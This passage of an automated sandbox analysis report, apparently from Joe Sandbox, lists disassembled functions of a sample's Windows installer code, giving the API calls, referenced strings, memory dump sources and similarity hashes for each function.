• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
• String ID:
• API String ID: 375863564-0
• Opcode ID: 2d5a952dda77e96b055630d762204063f474f2b74445c94d99100d457d81a94c
• Instruction ID: 01d81588b69ff1f480347e903aed9c185fc6c29f227380d1fa6610f1b9ad60dd
• Opcode Fuzzy Hash: 2d5a952dda77e96b055630d762204063f474f2b74445c94d99100d457d81a94c
• Instruction Fuzzy Hash: A8513C712086449BDB50EF69C8C0B9B77E8EF48314F15566AFD48CB286C738EC81CB99
APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
• GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
• GetFileType.KERNEL32(?,000000F5), ref: 00404C11
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
• GetLastError.KERNEL32(000000F5), ref: 00404C46
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
• String ID:
• API String ID: 1694776339-0
• Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
• Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
• Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
• Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
APIs
• GetSystemMenu.USER32(00000000,00000000), ref: 004221A3
• DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 004221C1
• DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221CE
• DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221DB
• DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221E8
• DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 004221F5
• DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422202
• DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042220F
• EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 0042222D
• EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 00422249
Similarity
• API ID: Menu$Delete$EnableItem$System
• String ID:
• API String ID: 3985193851-0
• Opcode ID: 05b40914ec909e1c9740d8afeb2cf42751dc2338b7eead5136cc8733da9e1836
• Instruction ID: e98f5eede000e984507cfb68b46ad6efe0a5c83d9602cc3651cf502f29ecaa29
• Opcode Fuzzy Hash: 05b40914ec909e1c9740d8afeb2cf42751dc2338b7eead5136cc8733da9e1836
• Instruction Fuzzy Hash: 23213370380744BAE720D725DD8BF9B7BD89B04708F0444A5BA487F2D7C6F9AE40869C
APIs
• FreeLibrary.KERNEL32(10000000), ref: 0047C4F4
• FreeLibrary.KERNEL32(00000000), ref: 0047C508
• SendNotifyMessageA.USER32(00010474,00000496,00002710,00000000), ref: 0047C57A
Strings
• DeinitializeSetup, xrefs: 0047C405
• Restarting Windows., xrefs: 0047C555
• Not restarting Windows because Setup is being run from the debugger., xrefs: 0047C529
• Deinitializing Setup., xrefs: 0047C36A
• GetCustomSetupExitCode, xrefs: 0047C3A9
Similarity
• API ID: FreeLibrary$MessageNotifySend
• String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
• API String ID: 3817813901-1884538726
• Opcode ID: efad5fb6bae037c2cf07564e1a1779af0bcde21ed03e767c6d92b2780cbdc405
• Instruction ID: 90f5f2579ebd2cd042589c700d0c35de107af6cb7106057c8f5cc839c7e64824
• Opcode Fuzzy Hash: efad5fb6bae037c2cf07564e1a1779af0bcde21ed03e767c6d92b2780cbdc405
• Instruction Fuzzy Hash: 5851B130614200AFD721DB79DC95BAA7BE4EB59314F50C57BEC08C72A2DB38A845CB5D
APIs
  • Part of subcall function 00457B28: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00457C5A,00000000,00457DA7,?,00000000,00000000,00000000), ref: 00457B75
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00457DA7,?,00000000,00000000,00000000), ref: 00457CB6
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00457DA7,?,00000000,00000000,00000000), ref: 00457D1C
  • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
Strings
• .NET Framework version %s not found, xrefs: 00457D56
• .NET Framework not found, xrefs: 00457D6A
• v1.1.4322, xrefs: 00457D0E
• v2.0.50727, xrefs: 00457CA8
• SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00457CD0
• SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00457C6A
Similarity
• API ID: Close$Open
• String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$v1.1.4322$v2.0.50727
• API String ID: 2976201327-1070292914
• Opcode ID: 38dafa01eb145cd46e344ec0d302f40d6a4ca12a07449fb32f1c0fadfb05638c
• Instruction ID: 1181c51870a89a76828bf4cdafa164266e6ab86bcafa1da5c5d87414d128b815
• Opcode Fuzzy Hash: 38dafa01eb145cd46e344ec0d302f40d6a4ca12a07449fb32f1c0fadfb05638c
• Instruction Fuzzy Hash: 5F41C730A081495FCB00DF65E851BEE77B6EF49309F5544BBE840DB292D739AA0ECB58
APIs
  • Part of subcall function 004732C8: GetWindowThreadProcessId.USER32(00000000), ref: 004732D0
  • Part of subcall function 004732C8: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004733C7,0pI,00000000), ref: 004732E3
  • Part of subcall function 004732C8: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004732E9
• SendMessageA.USER32(00000000,0000004A,00000000,Z7G), ref: 004733D5
• GetTickCount.KERNEL32 ref: 0047341A
• GetTickCount.KERNEL32 ref: 00473424
• MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00473479
Similarity
• API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
• String ID: 0pI$CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d$Z7G
• API String ID: 613034392-2401662188
• Opcode ID: 8feb52f6250f747c5a664b1527b2b5cd8d32300bfcf5c1eaa96ed0b76df53d0f
• Instruction ID: 8dd7748eb102d70c53ef4d50441e40eca7a6ef9e476b6454bb3470e68b985026
• Opcode Fuzzy Hash: 8feb52f6250f747c5a664b1527b2b5cd8d32300bfcf5c1eaa96ed0b76df53d0f
• Instruction Fuzzy Hash: 6F31C434F002259ADB10EFB999467EEB2E09F04305F50813BB548EB382DA7C8E01979D
APIs
• SHGetMalloc.SHELL32(?), ref: 0045E013
• GetActiveWindow.USER32 ref: 0045E077
• CoInitialize.OLE32(00000000), ref: 0045E08B
• SHBrowseForFolder.SHELL32(?), ref: 0045E0A2
• 76C9D120.OLE32(0045E0E3,00000000,?,?,?,?,?,00000000,0045E167), ref: 0045E0B7
• SetActiveWindow.USER32(?,0045E0E3,00000000,?,?,?,?,?,00000000,0045E167), ref: 0045E0CD
• SetActiveWindow.USER32(?,?,0045E0E3,00000000,?,?,?,?,?,00000000,0045E167), ref: 0045E0D6
Similarity
• API ID: ActiveWindow$BrowseD120FolderInitializeMalloc
• String ID: A
• API String ID: 2698730301-3554254475
• Opcode ID: 4c93aed7974da8df2999b89a302ce796433789b5a6ec67c560a89b0d32607bd6
• Instruction ID: 6bfd7eabbe9e682b3dde037a987c9ea474e9b057d6f32f0a8e83a6328ca7ae7b
• Opcode Fuzzy Hash: 4c93aed7974da8df2999b89a302ce796433789b5a6ec67c560a89b0d32607bd6
• Instruction Fuzzy Hash: D0314471D00218AFDB04EFA6E886A9EBBF8EF09704F51447AF804E7252D7785A04CF59
APIs
• GetSystemMetrics.USER32(0000000E), ref: 00418BE0
• GetSystemMetrics.USER32(0000000D), ref: 00418BE8
• 6F552980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418BEE
  • Part of subcall function 00409920: 6F54C400.COMCTL32((fI,000000FF,00000000,00418C1C,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00409924
• 6F5BCB00.COMCTL32((fI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C3E
• 6F5BC740.COMCTL32(00000000,?,(fI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418C49
• 6F5BCB00.COMCTL32((fI,00000001,?,?,00000000,?,(fI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000), ref: 00418C5C
• 6F550860.COMCTL32((fI,00418C7F,?,00000000,?,(fI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E), ref: 00418C72
Similarity
• API ID: MetricsSystem$C400C740F550860F552980
• String ID: (fI
• API String ID: 1828538299-4122540895
• Opcode ID: 65e0913070e1a46d1e4049ee6121461fcfbb365fe4eb4b9520eb625876ba3720
• Instruction ID: ebdf7d90a3a22d50ab8fd643d9f8c48181b88e499e337cf830e96f2c39c8652b
• Opcode Fuzzy Hash: 65e0913070e1a46d1e4049ee6121461fcfbb365fe4eb4b9520eb625876ba3720
• Instruction Fuzzy Hash: 19113675744204BADB50EBF5DC82F5E77B8DB48704F50406AB604E72D2E6799D408768
APIs
• GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045B999
• GetProcAddress.KERNEL32(00000000,inflate), ref: 0045B9A9
• GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045B9B9
• GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045B9C9
Similarity
• API ID: AddressProc
• String ID: inflate$inflateEnd$inflateInit_$inflateReset
• API String ID: 190572456-3516654456
• Opcode ID: cdec3d2289940290433f74bcfb90cd33ccdd8b1be43608ea6e51ef040730019a
• Instruction ID: 02f39ce5c28d2ed3ade6aba6a28faafd9b0cc1bc692c698d2602f952355582ec
• Opcode Fuzzy Hash: cdec3d2289940290433f74bcfb90cd33ccdd8b1be43608ea6e51ef040730019a
• Instruction Fuzzy Hash: 020121B0518300DADB24DF379C81B263695E764356F14893BA944552A2D77C0549EBDC
APIs
• SetBkColor.GDI32(?,00000000), ref: 0041A929
• 73A14D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A963
• SetBkColor.GDI32(?,?), ref: 0041A978
• StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041A9C2
• SetTextColor.GDI32(00000000,00000000), ref: 0041A9CD
• SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041A9DD
• StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AA1C
• SetTextColor.GDI32(00000000,00000000), ref: 0041AA26
• SetBkColor.GDI32(00000000,?), ref: 0041AA33
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: Color$StretchText
• String ID:
• API String ID: 2984075790-0
• Opcode ID: 70494902a934abd88d8421d1aeec792968b072de73e514355a54ff46ed356d3f
• Instruction ID: 69ae49bf6c4e82acacdff2fe07525d2a8d99776db7c40e28fbb8516f53671917
• Opcode Fuzzy Hash: 70494902a934abd88d8421d1aeec792968b072de73e514355a54ff46ed356d3f
• Instruction Fuzzy Hash: B461D6B5A00505EFCB40EFA9D985E9AB7F8EF48314B14816AF518DB252C734ED41CF58
APIs
  • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,004564E8,?, /s ",?,regsvr32.exe",?,004564E8), ref: 0045645A
Similarity
• API ID: CloseDirectoryHandleSystem
• String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
• API String ID: 2051275411-1862435767
• Opcode ID: edf60017c2564d3275548d2cadab5662920130db2b9ae15ca25aa1c268591cd9
• Instruction ID: 0727363c7f1249558044398805bdccd0d7d16a74982410126c53be3864fdc62d
• Opcode Fuzzy Hash: edf60017c2564d3275548d2cadab5662920130db2b9ae15ca25aa1c268591cd9
• Instruction Fuzzy Hash: 1B41E570E403086BDB10EFD5D881B9DB7F9AF49305F91407BA904BB296D7789A09CB1D
APIs
• OffsetRect.USER32(?,00000001,00000001), ref: 0044CBDD
• GetSysColor.USER32(00000014), ref: 0044CBE4
• SetTextColor.GDI32(00000000,00000000), ref: 0044CBFC
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CC25
• OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CC2F
• GetSysColor.USER32(00000010), ref: 0044CC36
• SetTextColor.GDI32(00000000,00000000), ref: 0044CC4E
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CC77
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CCA2
Similarity
• API ID: Text$Color$Draw$OffsetRect
• String ID:
• API String ID: 1005981011-0
• Opcode ID: 123d1c78d96388b48013e2d686bd4fbc3c46f036129ba804cfc4942d94a5bc27
• Instruction ID: 1caa52e0a57a24b19c6a51c3cca57839e66ec70a0d40fc0ec19372c69ab55c34
• Opcode Fuzzy Hash: 123d1c78d96388b48013e2d686bd4fbc3c46f036129ba804cfc4942d94a5bc27
• Instruction Fuzzy Hash: 1D21CFB42015007FC710FB2ACD8AE9BBBECDF19319B05457A7958EB3A3C678DD408669
APIs
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004528FB
Similarity
• API ID: PrivateProfileStringWrite
• String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]$o1I
• API String ID: 390214022-2878587892
• Opcode ID: 180da5cb8003d792c816aeea415edf5bd33e2b8e779ba911190ea486055d5340
• Instruction ID: cc9533ecac0167aba3f68936dda73933724a2a20dcf6fda83704f45a3cd3408f
• Opcode Fuzzy Hash: 180da5cb8003d792c816aeea415edf5bd33e2b8e779ba911190ea486055d5340
• Instruction Fuzzy Hash: C1912274A002099BDB11EFA5D982BDEB7B5EF49305F508067E800B7392D7B86E09CB59
APIs
  • Part of subcall function 00450088: SetEndOfFile.KERNEL32(?,?,0045AA1E,00000000,0045ABA9,?,00000000,00000002,00000002), ref: 0045008F
  • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00496628,00492DAD,00000000,00492E02,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
• GetWindowThreadProcessId.USER32(00000000,?), ref: 00490D19
• OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00490D2D
• SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00490D47
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00490D53
• CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00490D59
• Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00490D6C
Strings
• Deleting Uninstall data files., xrefs: 00490C8F
Similarity
• API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
• String ID: Deleting Uninstall data files.
• API String ID: 1570157960-2568741658
• Opcode ID: f2578554030a24c7267b533a633fac1857f9ff088767cb74f3f53633749f6caa
• Instruction ID: fe893ce7c7fc4f02ce2c16f04c74f522583f7d0dd1eba0bd56840a119b19c503
• Opcode Fuzzy Hash: f2578554030a24c7267b533a633fac1857f9ff088767cb74f3f53633749f6caa
• Instruction Fuzzy Hash: 2A217371358240AEEB10A7A6EC42B273B9CDB54318F50063BF5049B2E3DA7CAC44D76D
APIs
  • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
• RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046C215,?,?,?,?,00000000), ref: 0046C17F
• RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046C215), ref: 0046C196
• AddFontResourceA.GDI32(00000000), ref: 0046C1B3
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046C1C7
Strings
• Failed to open Fonts registry key., xrefs: 0046C19D
• Failed to set value in Fonts registry key., xrefs: 0046C188
• AddFontResource, xrefs: 0046C1D1
Similarity
• API ID: CloseFontMessageNotifyOpenResourceSendValue
• String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
• API String ID: 955540645-649663873
• Opcode ID: d0cfe69457fce7bbbc28504f119b2d4c3be8b6de6538d31fc16afe2da0dcfddb
• Instruction ID: 8ea992291a1dd30632b8682880332e8f2f5ba9678f4ac26e890d70cee17ca1cd
• Opcode Fuzzy Hash: d0cfe69457fce7bbbc28504f119b2d4c3be8b6de6538d31fc16afe2da0dcfddb
• Instruction Fuzzy Hash: 8221E570B402047AE710EAA68C92F7A639CDB45748F504477BD40EB2C2E67C9D05966E
APIs
  • Part of subcall function 00416380: GetClassInfoA.USER32(00400000,?,?), ref: 004163EF
  • Part of subcall function 00416380: UnregisterClassA.USER32(?,00400000), ref: 0041641B
  • Part of subcall function 00416380: RegisterClassA.USER32(?), ref: 0041643E
• GetVersion.KERNEL32 ref: 0045F718
• SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 0045F756
• SHGetFileInfo.SHELL32(0045F7F4,00000000,?,00000160,00004011), ref: 0045F773
• LoadCursorA.USER32(00000000,00007F02), ref: 0045F791
• SetCursor.USER32(00000000,00000000,00007F02,0045F7F4,00000000,?,00000160,00004011), ref: 0045F797
• SetCursor.USER32(?,0045F7D7,00007F02,0045F7F4,00000000,?,00000160,00004011), ref: 0045F7CA
Similarity
• API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
• String ID: Explorer
• API String ID: 2594429197-512347832
• Opcode ID: e3239e46c257503266597b56140d29e20775804faaf584886ec342b17592225d
• Instruction ID: 7ff7faf5247c26d25335c70635a1860a407a0e5f323aeaa6378cd2fc5b7ea516
• Opcode Fuzzy Hash: e3239e46c257503266597b56140d29e20775804faaf584886ec342b17592225d
• Instruction Fuzzy Hash: B121E7317403046BE710BBB98C47F9A76989B09709F4144BFBB05EA6C3DA7C9C09866D
APIs
• GetLastError.KERNEL32(00000000,0045869A,?,00000000,00000000,00000000,?,00000006,?,00000000,00491FBA,?,00000000,0049205D), ref: 004585DE
  • Part of subcall function 00452EB8: FindClose.KERNEL32(000000FF,00452FAE), ref: 00452F9D
Strings
• Failed to delete directory (%d). Will retry later., xrefs: 004585F7
• Failed to delete directory (%d)., xrefs: 00458674
• Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00458653
• Failed to strip read-only attribute., xrefs: 004585AC
• Deleting directory: %s, xrefs: 00458567
• Stripped read-only attribute., xrefs: 004585A0
• Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004585B8
Similarity
• API ID: CloseErrorFindLast
• String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
• API String ID: 754982922-1448842058
• Opcode ID: d02289ac0552954b959a3ec27135d6527882d3cbb7a983ba8985732d5b1c3507
• Instruction ID: dd70d7a7e9406b9190765920557ab5b8ad56b684bc2d1b190e3df41212a100e3
• Opcode Fuzzy Hash: d02289ac0552954b959a3ec27135d6527882d3cbb7a983ba8985732d5b1c3507
• Instruction Fuzzy Hash: 3B418630B042489BCB10DB6988427AE76E59B8930AF55857FAC05B7393DF7C890D8B5A
APIs
• GetCapture.USER32 ref: 00422E14
• GetCapture.USER32 ref: 00422E23
• SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422E29
• ReleaseCapture.USER32 ref: 00422E2E
• GetActiveWindow.USER32 ref: 00422E3D
• SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422EBC
• SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422F20
• GetActiveWindow.USER32 ref: 00422F2F
Similarity
• API ID: CaptureMessageSend$ActiveWindow$Release
• String ID:
• API String ID: 862346643-0
• Opcode ID: 8d225d8a55f9a88f292a2c30a551b716c13a14df50b62869e123561c13ee422b
• Instruction ID: 3dc7d5c5dffcbd9cfc95175fcc265abaf37585ce791e678acf2218af3f88607c
• Opcode Fuzzy Hash: 8d225d8a55f9a88f292a2c30a551b716c13a14df50b62869e123561c13ee422b
• Instruction Fuzzy Hash: 19416270B00244AFDB50EBA9DA42B9E77F1EF04304F5540BAF404AB3A2D7B99E40DB18
                                                                                      APIs
                                                                                      • 73A0A570.USER32(00000000), ref: 004293FA
                                                                                      • GetTextMetricsA.GDI32(00000000), ref: 00429403
                                                                                        • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00429412
                                                                                      • GetTextMetricsA.GDI32(00000000,?), ref: 0042941F
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00429426
                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0042942E
                                                                                      • GetSystemMetrics.USER32(00000006), ref: 00429453
                                                                                      • GetSystemMetrics.USER32(00000006), ref: 0042946D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                                      • String ID:
                                                                                      • API String ID: 361401722-0
                                                                                      • Opcode ID: aa0e22ae2bb85fef1fe3d4d4a9dea72362df36d5d975f8d53732e0b8776d61f5
                                                                                      • Instruction ID: 6143225b0a8ca3b977d6363335e7cd80f7f8ea5cda66b8f0fa851fdc2eb08b32
                                                                                      • Opcode Fuzzy Hash: aa0e22ae2bb85fef1fe3d4d4a9dea72362df36d5d975f8d53732e0b8776d61f5
                                                                                      • Instruction Fuzzy Hash: 360104917087103BF710B2769CC2F6B6188DB9435CF44003FFA469A3D3D56C8C45866A
                                                                                      APIs
                                                                                      • 73A0A570.USER32(00000000,?,00418FC9,00493201), ref: 0041DD97
                                                                                      • 73A14620.GDI32(00000000,0000005A,00000000,?,00418FC9,00493201), ref: 0041DDA1
                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00418FC9,00493201), ref: 0041DDAE
                                                                                      • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DDBD
                                                                                      • GetStockObject.GDI32(00000007), ref: 0041DDCB
                                                                                      • GetStockObject.GDI32(00000005), ref: 0041DDD7
                                                                                      • GetStockObject.GDI32(0000000D), ref: 0041DDE3
                                                                                      • LoadIconA.USER32(00000000,00007F00), ref: 0041DDF4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectStock$A14620A480A570IconLoad
                                                                                      • String ID:
                                                                                      • API String ID: 2920975243-0
                                                                                      • Opcode ID: 79ba34301ffdcd870fce82e69020cd4fb5d8953881da513776c9bfc891f1925d
                                                                                      • Instruction ID: bf46a9fe5e63f1af167cdf0a983a4ac464f15f0dd566559e746e50b59b955e29
                                                                                      • Opcode Fuzzy Hash: 79ba34301ffdcd870fce82e69020cd4fb5d8953881da513776c9bfc891f1925d
                                                                                      • Instruction Fuzzy Hash: A11130706453419AE740BF655992BA63690DB64748F01813FF609AF2D2DB7A0C448B5E
                                                                                      APIs
                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0045FBFC
                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00000000,0045FC91), ref: 0045FC02
                                                                                      • SetCursor.USER32(?,0045FC79,00007F02,00000000,0045FC91), ref: 0045FC6C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cursor$Load
                                                                                      • String ID: $ $Internal error: Item already expanding
                                                                                      • API String ID: 1675784387-1948079669
                                                                                      • Opcode ID: 2a5e59fbc60391709db9e707cfb1b81175e986b7537cdf1dfc64ada719463c73
                                                                                      • Instruction ID: 7a834110d2e8282c1345bf2880c47fa17af2e43f078088a6ac64f542608522eb
                                                                                      • Opcode Fuzzy Hash: 2a5e59fbc60391709db9e707cfb1b81175e986b7537cdf1dfc64ada719463c73
